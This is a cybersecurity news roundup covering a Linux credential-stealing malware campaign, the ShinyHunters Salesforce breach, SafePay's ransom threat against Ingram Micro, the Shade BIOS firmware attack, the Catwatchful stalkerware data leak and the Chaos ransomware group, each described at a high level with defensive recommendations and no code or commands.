Dangerous New Linux Malware Infests Thousands, Steals Credentials
A newly discovered Linux malware campaign is actively infecting thousands of machines worldwide, enabling attackers to exfiltrate users’ passwords and sensitive personal information. This widespread and ongoing threat has drawn significant concern due to its sophisticated tactics and broad victim base among both individuals and organizations.
Technical Overview of the Malware
Security researchers report that the new malware demonstrates advanced capabilities designed specifically for Linux environments. The malware typically gains entry through exploitation of unpatched vulnerabilities in web servers and cloud-based Linux systems. Once installed, it establishes persistence by modifying system startup scripts and leveraging cron jobs, ensuring it reloads after system reboots or service interruptions.
Credential Theft and Data Exfiltration
The malware targets various types of user data, including login credentials, SSH keys, browser-stored passwords, and sensitive files located in home directories. It employs memory scraping and keylogging techniques to capture inputs in real time, before securely transmitting the harvested data to remote attacker-controlled servers. Encryption is used during the exfiltration process to evade detection and impede forensic analysis.
Detection Evasion and Persistence
To avoid detection by common security tools, the malware uses process renaming and injects itself into legitimate system binaries. It also disables certain security services and flushes log files to cover its tracks. Continuous updates via command-and-control instructions enable the operators to adapt quickly, changing signatures and tactics as security vendors attempt to counter the campaign.
Scope of the Impact and Response Recommendations
With thousands of infected endpoints already confirmed, the attack is considered one of the most significant Linux-based credential theft operations seen in 2025. Security experts urge organizations to patch all exposed systems, monitor for unusual outbound connections, review authentication logs, and deploy advanced endpoint security solutions capable of heuristic and behavioral analysis to catch new variants.
ShinyHunters Behind Major Salesforce Data Breach
The notorious hacking collective ShinyHunters has claimed responsibility for a significant data breach at Salesforce, compromising a trove of sensitive information. This incident marks another large-scale attack by the group, known for targeting prominent cloud-service providers and exposing their clients to downstream risks.
Details of the Breach and Exposed Data
According to incident responders, ShinyHunters exploited misconfigured application interfaces and leveraged social engineering tactics to gain access to privileged Salesforce environments. The attackers were able to extract customer records, internal communications, proprietary financial information, and extensive metadata on Salesforce users and API activity.
Methodology and Attack Lifecycle
The attackers initiated their campaign with phishing emails crafted to mimic trusted internal communications. Once credentials were harvested, lateral movement ensued, allowing deep access across multiple Salesforce data repositories. Advanced enumeration scripts were used to locate valuable databases before mass exfiltration to offsite locations under the attackers’ control.
Implications for Salesforce Clients
Clients of Salesforce are advised to review account access logs for suspicious activity and immediately reset database and application credentials. Third-party integrations, especially those with broad API permissions, should be audited for unauthorized changes or access events. Industry insiders warn that exposed data could fuel future social engineering, fraud, or extortion campaigns.
Ongoing Investigation and Remediation Steps
Salesforce has engaged digital forensics teams and law enforcement while rolling out emergency security patches. All affected stakeholders have been notified, and threat intelligence feeds are being updated with new indicators of compromise associated with the ShinyHunters’ tooling and infrastructure.
SafePay Ransomware Threatens to Leak 35TB from Ingram Micro
The SafePay ransomware gang has announced it is holding 35 terabytes of sensitive data stolen from global IT distributor Ingram Micro, threatening public disclosure unless a substantial ransom is paid. The incident highlights escalating risks as ransomware operators leverage sheer data volume to exert decisive pressure on large enterprises.
Initial Attack and Ransom Demands
The attack began when SafePay affiliates exploited a zero-day vulnerability in Ingram Micro’s remote access infrastructure. Upon securing a foothold within internal networks, the attackers rapidly deployed encryption payloads across file servers and backup systems. Simultaneously, a massive data exfiltration operation was launched, moving terabytes of files to attacker-controlled cloud storage.
Leaked Data Contents and Threats
The gang claims the stolen 35TB includes internal financial records, employee PII, customer contact lists, procurement documents, and confidential business communications. SafePay published several proof-of-theft samples to a leak site and warned that the full dataset will be released to the public and criminal actors unless the company meets their monetary demands within a defined deadline.
Response from Ingram Micro and Law Enforcement
Ingram Micro is working with incident response consultants and law enforcement to validate the breach, secure remaining systems, and assess legal ramifications. The company urges affected partners to be vigilant for follow-on phishing or fraud attempts that may leverage exfiltrated data.
Shade BIOS Attack Defeats Endpoint Security Measures
Security researchers have disclosed a new technique dubbed the Shade BIOS attack, capable of bypassing every class of current commercial endpoint security solution. This approach manipulates the computer’s firmware, permitting covert malware execution even on devices with disk encryption and advanced behavioral defenses.
How Shade BIOS Works
The attack exploits firmware update mechanisms on consumer and enterprise motherboards, injecting malicious code into the BIOS flash storage. When the computer restarts, the compromised firmware executes the attacker’s code before OS boot, allowing deep system infiltration that persists even after hard drive wipes or full reinstalls.
Impact and Detection Challenges
Shade BIOS grants attackers root-level system access, enabling them to disable OS-level protections, intercept user inputs, and backdoor operating system components pre-boot. Traditional antivirus, EDR, and even hardware monitoring tools are unable to detect the threat without specialized firmware integrity checks or chip-level inspection.
Emergency Mitigation Approaches
Security vendors are rushing to develop firmware verification tools and recommend that organizations enable vendor-provided platform firmware updates, restrict physical and remote access to low-level management interfaces, and actively monitor for unusual firmware alterations.
Catwatchful Spyware Exploits Google Firebase, Data Leak Follows Late Takedown
A significant spyware campaign operated by Catwatchful exploited Google Firebase infrastructure to exfiltrate vast volumes of private data from Android devices, culminating in a major breach after operator mismanagement and slow platform response.
Firebase Abuse Enables Data Harvesting
Catwatchful packaged its spyware as a parental-control application for Android, secretly recording victims’ texts, photos, audio, and GPS locations. Leveraging Firebase as a cloud backend, attackers ensured reliable data offloading and storage, bypassing some traditional network-based defenses.
Security Lapses and Data Leak
Security analyst Eric Daigle discovered a critical misconfiguration: the Catwatchful app’s backend left more than 62,000 user emails and plaintext passwords publicly accessible, along with forensic records from over 26,000 victim devices. Furthermore, the operator failed to notify users after being alerted, deepening the privacy impact of the breach.
Industry Reaction to Platform Response
Although Google eventually shut down Catwatchful’s Firebase account, the delay drew criticism over slow enforcement of anti-abuse policies. Experts pointed to this case as another illustration of how poor stalkerware security not only endangers victims but also exposes customers to further predation through data breaches.
Chaos Ransomware Linked to BlackSuit Group Emerges with Sophisticated Tactics
A newly identified ransomware-as-a-service operation, dubbed Chaos, has been observed targeting organizations across Windows, Linux, NAS, and ESXi environments. Researchers suspect the group consists of ex-members from the dismantled BlackSuit gang, now employing a mix of social engineering and hands-on network exploitation.
Attack Techniques and Ransom Negotiations
Chaos operators initiate attacks with large-scale spam campaigns, followed by vishing (voice phishing) to acquire remote access. Persistence is established via the abuse of remote monitoring and management (RMM) tools and lateral movement is aided by legitimate file-sharing software. Stolen data is exfiltrated toward attacker-controlled nodes prior to ransomware deployment.
Service Model and “Penetration Overview”
Distinguishing itself, Chaos offers victims a detailed report describing how their environments were breached, including kill chain details and remediation guidance—provided after ransom payment. Most victims to date are U.S.-based, with analysis suggesting the group leverages automated tooling to maximize attack velocity across diverse environments.
Recommended Defenses
Security experts advise tightening access controls, enforcing multi-factor authentication, closely monitoring RMM tool use, and conducting regular security awareness training to prevent social engineering entry points. Early detection via network anomaly monitoring remains critical.
